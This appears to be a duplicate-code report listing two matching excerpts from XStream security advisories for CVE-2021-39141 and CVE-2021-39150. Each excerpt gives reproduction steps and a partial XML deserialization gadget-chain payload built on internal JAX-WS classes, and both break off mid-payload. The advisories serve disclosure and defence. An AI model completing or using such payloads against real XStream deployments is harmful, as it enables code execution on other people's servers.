xstream-distribution/src/content/CVE-2021-39141.html [33:85]: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Steps to Reproduce

Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with the following snippet and unmarshal it again with XStream:

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <dynamic-proxy>
      <interface>java.lang.Comparable</interface>
      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
        <owner/>
        <managedObjectManagerClosed>false</managedObjectManagerClosed>
        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
          <stubHandlers>
            <entry>
              <method>
                <class>java.lang.Comparable</class>
                <name>compareTo</name>
                <parameter-types>
                  <class>java.lang.Object</class>
                </parameter-types>
              </method>
              <com.sun.xml.internal.ws.client.sei.StubHandler>
                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
                  <indices>
                    <int>0</int>
                  </indices>
                  <getters>
                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
                  </getters>
                  <accessors>
                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
                      <val_-isJAXBElement>false</val_-isJAXBElement>
                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
                        <type>int</type>
                        <field>
                          <name>hash</name>
                          <clazz>java.lang.String</clazz>
                        </field>
                      </val_-getter>
                      <val_-isListType>false</val_-isListType>
                      <val_-n>
                        <namespaceURI/>
                        <localPart>hash</localPart>
                        <prefix/>
                      </val_-n>
                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
                        <type>java.lang.String</type>
                        <method>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



xstream-distribution/src/content/CVE-2021-39150.html [35:87]:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    

Steps to Reproduce

Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with the following snippet and unmarshal it again with XStream:

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <dynamic-proxy>
      <interface>java.lang.Comparable</interface>
      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
        <owner/>
        <managedObjectManagerClosed>false</managedObjectManagerClosed>
        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
          <stubHandlers>
            <entry>
              <method>
                <class>java.lang.Comparable</class>
                <name>compareTo</name>
                <parameter-types>
                  <class>java.lang.Object</class>
                </parameter-types>
              </method>
              <com.sun.xml.internal.ws.client.sei.StubHandler>
                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
                  <indices>
                    <int>0</int>
                  </indices>
                  <getters>
                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
                  </getters>
                  <accessors>
                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
                      <val_-isJAXBElement>false</val_-isJAXBElement>
                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
                        <type>int</type>
                        <field>
                          <name>hash</name>
                          <clazz>java.lang.String</clazz>
                        </field>
                      </val_-getter>
                      <val_-isListType>false</val_-isListType>
                      <val_-n>
                        <namespaceURI/>
                        <localPart>hash</localPart>
                        <prefix/>
                      </val_-n>
                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
                        <type>java.lang.String</type>
                        <method>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -